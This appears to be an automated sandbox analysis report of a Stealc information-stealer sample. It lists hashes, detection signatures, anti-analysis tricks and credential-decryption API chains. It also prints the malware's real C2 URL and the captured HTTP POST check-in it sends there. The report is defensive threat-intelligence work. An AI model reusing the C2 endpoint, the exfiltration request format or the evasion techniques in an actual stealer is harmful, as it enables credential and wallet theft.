Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545193
MD5:08c45770fb113a8cc6eabcf3eb588ca6
SHA1:a034829953fc29313687c189cff3990faa2cb3d1
SHA256:93faedac76dce091632f52fcbabc5e2148ad2e9e145e2f44bdf733416301c15b
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4448 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 08C45770FB113A8CC6EABCF3EB588CA6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2057789916.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 4448JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 4448JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.360000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T08:22:06.290913+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.360000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00379030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00379030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0036A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0036A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003672A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_003672A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0036C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003740F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003740F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0036E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00361710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00361710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0036F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003747C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_003747C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00373B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00373B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00374B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00374B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0036DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0036EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0036BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0036DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 39 32 34 36 38 35 34 31 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="hwid"F892468541661964116302------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="build"tale------CGIDGCGIEGDGDGDGHJKK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003662D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_003662D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 39 32 34 36 38 35 34 31 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="hwid"F892468541661964116302------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="build"tale------CGIDGCGIEGDGDGDGHJKK--
                Source: file.exe, 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%
                Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/s
                Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpEs
                Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/J
                Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA0_2_007B30FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A00980_2_003A0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003921380_2_00392138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BB1980_2_003BB198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CE2580_2_003CE258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A42880_2_003A4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B228B0_2_006B228B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BF37A0_2_007BF37A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003EB3080_2_003EB308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DD39E0_2_003DD39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B83D80_2_007B83D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E53C40_2_006E53C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BD4EF0_2_007BD4EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003845730_2_00384573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038E5440_2_0038E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A45A80_2_003A45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CD5A80_2_003CD5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DA6480_2_003DA648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007886D20_2_007886D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E96FD0_2_003E96FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A66C80_2_003A66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BD7200_2_003BD720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D67990_2_003D6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B48680_2_003B4868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B98B80_2_003B98B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B68F50_2_007B68F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BB8A80_2_003BB8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008248580_2_00824858
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CF8D60_2_003CF8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BBA170_2_007BBA17
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00834B920_2_00834B92
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D4BA80_2_003D4BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D0B880_2_003D0B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C8BD90_2_003C8BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DAC280_2_003DAC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B4C9B0_2_007B4C9B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CAD380_2_003CAD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00391D780_2_00391D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BBD680_2_003BBD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B5DB90_2_003B5DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9DF40_2_007B9DF4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B4DC80_2_003B4DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A8E780_2_003A8E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DBE1A0_2_006DBE1A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D1EE80_2_003D1EE8
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00364610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: qogoldvk ZLIB complexity 0.9947474502535341
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00379790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00379790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00373970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00373970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\D5RU27Q2.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2104320 > 1048576
                Source: file.exeStatic PE information: Raw size of qogoldvk is bigger than: 0x100000 < 0x196c00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.360000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qogoldvk:EW;tvuayiyt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qogoldvk:EW;tvuayiyt:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00379BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00379BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x206068 should be: 0x20648b
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: qogoldvk
                Source: file.exeStatic PE information: section name: tvuayiyt
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074706B push esi; mov dword ptr [esp], eax0_2_0074709C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074706B push 18ABE20Ch; mov dword ptr [esp], esi0_2_007470A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066F04D push ecx; mov dword ptr [esp], 7F76AC18h0_2_0066F091
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066F04D push ebp; mov dword ptr [esp], edx0_2_0066F127
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066F04D push ebp; mov dword ptr [esp], edi0_2_0066F14F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085C0BF push 490D1565h; mov dword ptr [esp], ebp0_2_0085C14B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089F0D6 push ecx; mov dword ptr [esp], edx0_2_0089F111
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push eax; mov dword ptr [esp], esi0_2_007B3105
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push eax; mov dword ptr [esp], 3751FDC9h0_2_007B3184
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push eax; mov dword ptr [esp], 76EB4465h0_2_007B31A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push 17E91298h; mov dword ptr [esp], eax0_2_007B3286
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push edx; mov dword ptr [esp], 27A6C39Eh0_2_007B32C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push ebx; mov dword ptr [esp], esi0_2_007B33BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push 29399800h; mov dword ptr [esp], edi0_2_007B3401
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push ebx; mov dword ptr [esp], ebp0_2_007B3407
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push edi; mov dword ptr [esp], edx0_2_007B3413
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push eax; mov dword ptr [esp], 05E7B47Dh0_2_007B346C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push 27F0C01Fh; mov dword ptr [esp], ebp0_2_007B34CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push ecx; mov dword ptr [esp], edi0_2_007B34DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push edi; mov dword ptr [esp], 6BFFCF7Dh0_2_007B352B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push esi; mov dword ptr [esp], 177F106Fh0_2_007B35BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push eax; mov dword ptr [esp], 0ADFA4E6h0_2_007B362E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push 078F139Bh; mov dword ptr [esp], edi0_2_007B3665
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push ecx; mov dword ptr [esp], ebp0_2_007B36FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push 183029D5h; mov dword ptr [esp], edi0_2_007B374A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push eax; mov dword ptr [esp], ebx0_2_007B37FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push ecx; mov dword ptr [esp], ebx0_2_007B3804
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push ecx; mov dword ptr [esp], edx0_2_007B383F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push ebx; mov dword ptr [esp], ecx0_2_007B3871
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push edx; mov dword ptr [esp], 2F7BC274h0_2_007B3876
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B30FA push 426A6686h; mov dword ptr [esp], edx0_2_007B3940
                Source: file.exeStatic PE information: section name: qogoldvk entropy: 7.95459631398814

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00379BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00379BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
